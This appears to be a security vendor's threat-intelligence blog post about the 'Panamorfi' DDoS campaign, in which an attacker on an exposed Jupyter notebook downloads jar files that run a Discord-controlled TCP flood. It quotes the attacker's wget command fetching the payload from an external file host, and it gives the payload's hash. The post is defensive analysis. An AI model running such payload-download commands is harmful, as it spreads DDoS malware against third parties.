Panamorfi: A New Discord DDoS Campaign

www.aquasec.com · Assaf Morag · 1 year ago · news
quality 7/10 · good
0 net
Tags
ddos cybersecurity discord
Panamorfi: A New Discord DDoS Campaign Aqua Blog Panamorfi: A New Discord DDoS Campaign Assaf Morag August 2, 2024 Aqua Nautilus researchers uncovered a new Distributed Denial of Service (DDoS) campaign dubbed ‘Panamorfi’, utilizing the Java written minecraft DDoS package – mineping – the threat actor launches a DDoS. Thus far we’ve only seen it deployed via misconfigured Jupyter notebooks. In this blog we explain about this attack, the techniques used by the threat actor and how to protect your environments. Attack flow The threat actor ‘yawixooo’ gained initial access on our exposed to the world Jupyter notebook honeypot. Then ran the following command: ‘wget https://filebin.net/archive/h4fhifnlykw224h9/zip’ They downloaded a zip file with a random name h4fhifnlykw224h9 that was new on Virus Total and only had 1 detection by ESET. This zip file (MD5: 42989a405c8d7c9cb68c323ae9a9a318) size is ~17 MB and contains 2 Jar files. Figure 1: The zip file with a single detection These two Jar files were also new in VT and only had 1 detection each by ESET. Figure 2: The conn.jar file with a single detection Figure 3: The mineping.jar file with a single detection The connector Jar file contains the initial execution code. As depicted below in the main function the threat actor is utilizing Discord to control the DDoS attack. The victims machine is connecting the Discord channel using the credentials specified below. Figure 4: The main function of connector jar It is loading mineping.jar which is a known DDoS minecraft server, and its code is available on GitHub. You can see in the code loading of the mineping.jar package in order to launch a TCP flood DDoS attack. This attack aims to consume the resources of the target server by sending a large number of TCP connection requests. The results are written to the Discord channel. Figure 5: The function that updates the Discord channel You can also see the threat actor identifies as ‘yawixooo’, loading a signature photo, enclosed below. Figure 6: The Panamorfi DDoS logo The package mineping.jar contains 12 java files, that enable among other loading http socket, using a proxy, flooding a victim, and creation of random connection details. The threat actor The threat actor identified themselves in the code as ‘yawixooo,’ which can be found on GitHub . During our investigation, it appears that the public repository is active. It contains a Minecraft server configuration and an HTML page that is currently under construction. Figure 7: The GitHub profile of the threat actor Figure 8: The website of the threat actor under construction Detection and remediation with Aqua’s CNAPP In this blog we covered an attack against a Jupyter notebook. Usually, data practitioners such as data engineers, data analysts and data scientists are the ones who use these kinds of applications. From what we have seen, we can say in both learning and practice, there is insufficient attention to security issues. Data practitioners often lack the knowledge and understanding; thus, they sometimes open room for misconfigurations or vulnerabilities. In this case, we leverage d Aqua’s Runtime Protection solution to detect the drift event and block i t s execution . Aqua’s advanced behavioral detection capabilities identify malicious or suspicious behavior in runtime and the granular runtime policies effectively block the events in real time . While vulnerability management and misconfiguration remediation are important for an overall cloud native security posture, we must assume that an attacker can gain access by exploiting a zero-day or unpatched vulnerability or misconfiguration. In this attack the next link in the attack kill chain (after the misconfiguration) is the payload. We assume that we can limit our data practitioners from executing anything out of the scope of the Jupyter notebook. Thus, we set our controls to block as can be seen in Figure 9 below. Figure 9: The Jupyter notebook container runtime policy is set to block any drift (attempt to run executable not in the original image) As you can see in Figure 10 below, our runtime policy blocks the file conn.jar from running. This de facto kills the entire attack. Figure 10: Aqua’s runtime protection completely blocks the attack before it even started Published under: SECURITY RESEARCH Tags: DevSecOps , Security Threats , Supply Chain Attacks Assaf Morag Assaf is the Director of Threat Intelligence at Aqua Nautilus. He is responsible of acquiring threat intelligence related to software development life cycle in cloud native environments, supports the team's data needs, and helps Aqua and the ecosystem remain at the forefront of emerging threats and protective methodologies. His research has been featured in leading information security publications and journals worldwide, and he has presented at leading cybersecurity conferences. Notably, Assaf has also contributed to the development of the new MITRE ATT&CK Container Framework. Assaf is leading an O’Reilly course, focusing on cyber threat intelligence in cloud-native environments. The course covers both theoretical concepts and practical applications, providing valuable insights into the unique challenges and strategies associated with securing cloud-native infrastructures. Need to secure enterprise workloads? Aqua Cloud Native Application Protection Platform (CNAPP) Go cloud native with the experts! Get Demo Aqua Security Aqua Security is the pioneer in securing containerized cloud native applications from development to production. Aqua's full lifecycle solution prevents attacks by enforcing pre-deployment hygiene and mitigates attacks in real time in production, reducing mean time to repair and overall business risk. The Aqua Platform, a Cloud Native Application Protection Platform (CNAPP), integrates security from Code to Cloud, combining the power of agent and agentless technology into a single solution. With enterprise scale that doesn’t slow development pipelines, Aqua secures your future in the cloud. Founded in 2015, Aqua is headquartered in Boston, MA and Ramat Gan, IL protecting over 500 of the world’s largest enterprises. Use Cases Automate DevSecOps Modernize Security CNDR Cloud Native Detection & Response Compliance and Auditing Serverless Containers & Functions Hybrid and Multi Cloud Federal Cloud Native Security Environments Kubernetes Security OpenShift Security AWS Security Azure Cloud Security Google Cloud Security Security for VMware Tanzu Docker Security IBM Z Security Partners Technology Partners Partner With Us Resources Aqua Security Research The Cloud Native Wiki Kubernetes 101 AWS Cloud Security Docker 101 The Cloud Native Channel O’Reilly Book: Kubernetes Security CNAPP 101 CSPM 101 Container Security 101 Learn with Aquademy! About Us About Aqua Newsroom Careers Brand Guidelines Trust, Security & Compliance Aqua Cloud Native Protection FAQ Professional services Get in Touch Aqua Blog Contact Us Success Portal Products Cloud Native Security Platform CSPM Cloud Security Container Security Kubernetes Security Serverless Security Cloud VM Security Dynamic Threat Analysis (DTA) Container Vulnerability Scanning Open Source Container Security Platform Integrations Get Started Copyright © 2026 Aqua Security Software Ltd. Privacy Policy | Terms of Use | Cookie Policy | Your Privacy Choices | Accessibility Tools Normal text size Medium text size Large text size Normal display Black & White display High contrast display Stop transitions and animations Underline Links
← Back to stories